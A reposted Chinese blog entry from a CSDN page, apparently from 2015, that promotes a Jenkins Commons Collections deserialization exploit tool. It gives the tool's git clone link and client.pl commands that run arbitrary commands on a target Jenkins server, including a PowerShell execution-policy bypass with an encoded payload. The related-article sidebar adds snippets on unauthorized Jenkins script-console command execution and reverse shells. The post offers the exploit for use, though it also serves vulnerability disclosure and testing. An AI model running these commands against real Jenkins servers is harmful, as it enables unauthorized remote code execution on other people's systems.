[转]Jenkins CommonCollections 完美利用(演示)工具

最新推荐文章于 2024-04-07 09:37:19 发布
最新推荐文章于 2024-04-07 09:37:19 发布
阅读量112 收藏
点赞数
文章标签: 运维 操作系统 java
原文链接:http://www.cnblogs.com/sevck/p/5019988.html
版权
博主URL:http://tools.changesec.com/Jenkins-CommonCollections-Exploit/

提交漏洞总是要证明漏洞危害,老外写的java代码又有bug,所以随手改掉了

点击这里下载代码,或者使用如下命令

git clone https://github.com/CaledoniaProject/jenkins-cli-exploit.git

来张截图吧,

工具的具体使用方法,

如果目标是 Linux、Mac 机器,请使用,

./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked'

如果是 Windows 机器,

./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx'

环境要求,

  1. 确保你安装了 java、perl
  2. 确保你安装了 IPC::Run 这个PERL模块,安装方法为 cpan IPC::Run
编写于 November 15, 2015

转载于:https://www.cnblogs.com/sevck/p/5019988.html

angaoux03775
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【异常】因为Common包没有加SNAPSHOT,导致了Jenkins编译报错
本本本添哥
01-04 464
Failed to execute goal on project xx-logicProvider: Could not resolve dependencies for project xx-logicProvider:jar:1.0.0: Failure to find xx-common:jar:1.0.0 in nexus地址 was cached in the local repository, resolution will not be reattempted until the upda
jenkins-common-pipeline:具有共享库的Jenkins通用管道
01-30
jenkins-common-pipeline:具有共享库的Jenkins通用管道
一款Jenkins的综合漏洞利用工具-JenkinsExploit-GUI
siu~
03-15 1708
一款Jenkins的综合漏洞利用工具
Jenkins远程命令执行漏洞(CVE-2018-1000861)
黑白的博客
12-07 2783
声明 好好学习,天天向上 漏洞描述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 影
JenkinsExploit-GUI:自动化Jenkins安全测试的新篇章
最新发布
gitblog_00040的博客
04-07 411
JenkinsExploit-GUI:自动化Jenkins安全测试的新篇章 项目地址:https://gitcode.com/TheBeastofwar/JenkinsExploit-GUI 项目简介 JenkinsExploit-GUI 是一个以图形化用户界面(GUI)形式提供的工具,专门用于检测和利用Jenkins服务器的安全漏洞。这个项目由TheBeastofwar开发,旨在帮助安全研究人员...
jenkins 漏洞集合 简介
热门推荐
whatday的专栏
06-04 1万+
目录 CVE-2015-8103 反序列化远程代码执行 CVE-2016-0788 Jenkins CI和LTS 远程代码执行漏洞 CVE-2016-0792 低权限用户命令执行 CVE-2016-9299 代码执行 CVE-2017-1000353 Jenkins-CI 远程代码执行 CVE-2018-1000110 用户枚举 CVE-2018-1000861 远程命令执行 CVE-2018-1999002 任意文件读取 CVE-2018-1000600 Jenkins GitHub 信
jenkins自动化部署持续交付演示ppt
04-24
Jenkins的分布式构建能力使其能充分利用多台服务器的资源,加快构建速度。丰富的插件生态系统使得Jenkins可以扩展到各种不同的应用场景和工具集成。 【Hudson及其优点】 Hudson是Jenkins的早期版本,同样提供了...
利用jenkins+jmeter搭建性能测试平台
01-27
利用Jenkins和JMeter搭建性能测试平台,可以自动化执行性能测试,提高测试效率,并及时发现潜在的性能瓶颈,这对于优化软件性能和提升用户体验具有重要意义。 【Jenkins简介】 Jenkins是一款开源的持续集成工具,...
Jenkins各种工具
02-09
【正文】 Jenkins是一款强大的持续集成(Continuous Integration, CI)和持续部署(Continuous...通过对其中内容的学习和实践,我们可以更好地利用Jenkins来推动敏捷开发和DevOps实践,从而提升软件开发的效率和质量。
jenkins工具安装部署
03-19
Jenkins是一款广泛使用的持续集成(Continuous Integration,简称CI)和持续交付(Continuous Deployment,简称CD)工具,它允许开发者在代码变更时自动构建、测试和部署软件。在本篇文章中,我们将详细介绍Jenkins...
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4559
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
jenkins shell 权限_Jenkins执行shell脚本时要设置权限
weixin_39531761的博客
12-20 474
目前出现了一个问题,当我独自用shell脚本执行启动springBoot时 就可以注册到eureka上如果用jenkins执行shell脚本时 就会出现注册不上去的情况2020-11-18 13:47:54.808 INFO 29482 --- [nfoReplicator-0] com.netflix.discovery.DiscoveryClient : DiscoveryClien...
Maven 公共项目更新后打包时引用不到的问题( common项目,Jenkins配置)
shiyuehit的博客
08-20 4271
最近做的项目用Jenkins做持续集成和持续交付。在Jenkins里配置好maven命令,自动执行。 前台的项目结构是这样的 mall-web-parent         -- innodata-web-common         -- innomall-web-member         -- innomall-web-mall common是公共的项目,member和mall...
Jenkins漏洞利用复现
weixin_30564901的博客
09-26 786
一、未授权访问 访问url: http://172.16.20.134:8080/script 命令执行 println "ls -al".execute().text 也可以利用powershell 或者python脚本反弹shell 二、CVE-2018-1000861远程命令执行漏洞 payload...
Jenkins反弹shell攻击(AppRun进程,xmrig)
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
05-17 2675
一、服务器环境 Centos 7 2核4G 经典网络 Jenkins服务器 二、排查流程 1.top命令查看服务器负载 top - 16:58:25 up 164 days, 1:36, 3 users, load average: 2.25, 2.49, 2.66 Tasks: 75 total, 2 running, 73 sleeping, 0 stopped, ...
pg_archivecleanup源码回归手序
dongxiao_highgo的博客
07-28 129
pg_archivecleanup源码回归
MySQL相关面试题
finalheart的博客
06-07 418
注:本篇是看了别人写的一些面试题,然后记录一下面试题的连接以及自己对面试题部分知识点的理解 我首先看的文章是下面这个,真的是太多了,有的没有说的很深,需要再进一步学习下。 https://blog.csdn.net/ThinkWon/article/details/104778621 1.MySQL text长度 mysql的text是65535的字节限制,而pg是不限制的、 2.覆盖索引**聚簇索引(https://blog.csdn.net/alexdamiao/articl...
jenkins远程命令执行利用工具
angaoux03775的博客
03-08 512
昨天看小飞侠写的py的jenkins的脚本,昨天晚上在微信里评论今天写一个JAVA的GUI的tools. 早上花了点时间写一下: code: package com.tools; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader;...
Jenkins升级-- 无条件远程代码执行高危漏洞
skypig555的专栏
03-14 812
起因 早上收到阿里云的安全中心的电话,说检测到我们部分服务器使用Jenkins,存在严重的安全漏洞。希望我们购买他们的安全防火墙,或者自己升级Jenkins。购买当然是不可能的拉。马上开始Jenkins升级。 硬货 停止之前的老版本 既然有漏洞,就先把老的版本服务停了。 安装新版本 这边我用的是docker-compose进行安装。docker和docker-compose的安装,自行百度。 v...
Jenkins入门教程:CI工具详解与实践
作者强调了Jenkins作为持续集成工具的重要性,特别是它的开源、跨平台、分布式构建和易于安装的特点。" Jenkins是一种广泛使用的开源持续集成(CI)工具,它源自Hudson项目,并且是持续交付领域中的一个重要组成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值